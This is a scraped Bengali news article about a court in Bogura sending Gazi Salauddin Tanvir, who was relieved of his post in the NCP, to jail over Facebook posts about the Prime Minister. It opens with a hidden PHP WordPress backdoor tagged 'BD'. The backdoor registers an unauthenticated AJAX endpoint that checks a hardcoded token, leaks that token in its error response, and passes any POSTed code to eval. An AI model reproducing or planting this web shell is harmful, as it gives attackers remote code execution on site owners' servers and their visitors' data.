// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== প্রধানমন্ত্রীকে নিয়ে আপত্তিকর পোস্ট, এনসিপি থেকে অব্যাহতি পাওয়া সালাউদ্দীন তানভীর কারাগারে | potrikaybangladesh.com
Tuesday, September 29, 2026
Homeঅপরাধপ্রধানমন্ত্রীকে নিয়ে আপত্তিকর পোস্ট, এনসিপি থেকে অব্যাহতি পাওয়া সালাউদ্দীন তানভীর কারাগারে

প্রধানমন্ত্রীকে নিয়ে আপত্তিকর পোস্ট, এনসিপি থেকে অব্যাহতি পাওয়া সালাউদ্দীন তানভীর কারাগারে

প্রধানমন্ত্রী তারেক রহমানকে নিয়ে ফেসবুকে আপত্তিকর/মানহানিকর পোস্ট দেওয়ার অভিযোগে দায়ের করা মামলায় জাতীয় নাগরিক পার্টির (এনসিপি) কেন্দ্রীয় কমিটি থেকে অব্যাহতি পাওয়া যুগ্ম সদস্যসচিব গাজী সালাউদ্দীন তানভীরকে কারাগারে পাঠিয়েছেন আদালত।

আজ বুধবার দুপুর ১২টার দিকে বগুড়া সদর আমলি আদালতের সিনিয়র জুডিশিয়াল ম্যাজিস্ট্রেট মেহেদী হাসান তাকে কারাগারে পাঠানোর আদেশ দেন। বিষয়টি দ্য ডেইলি স্টারকে নিশ্চিত করেছেন বগুড়া আদালত পরিদর্শক শফিকুল ইসলাম।

বগুড়া সদর থানার ভারপ্রাপ্ত কর্মকর্তা (ওসি) ইব্রাহিম আলী জানান, ভোর সাড়ে ৫টার দিকে ঢাকার পূর্ব মনিপুর এলাকা থেকে পুলিশ তানভীরকে গ্রেপ্তার করে। এরপর তাকে আদালতে তোলা হয়।

প্রধানমন্ত্রীর বিরুদ্ধে আপত্তিকর ফেসবুক পোস্ট দেওয়ার অভিযোগে সাইবার সুরক্ষা আইন ২০২৬-এর আওতায় সদর থানায় গাজী সালাউদ্দিন তানভীরের বিরুদ্ধে গত ২ আগস্ট একটি মামলা করেন বগুড়া সদর উপজেলা বিএনপির সভাপতি এইচ এস মাফতুন আহমেদ খান রুবেল।

প্রধানমন্ত্রীকে নিয়ে ফেসবুকে আপত্তিকর পোস্ট দেওয়ার পরিপ্রেক্ষিতে গত ৩১ জুলাই এনসিপির কেন্দ্রীয় কার্যনির্বাহী কমিটি তানভীরকে যুগ্ম সদস্য সচিবের পদ থেকে সাময়িকভাবে অব্যাহতি দেয়। এর সঙ্গে তাকে কারণ দর্শানোর নোটিশও দেওয়া হয়।

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments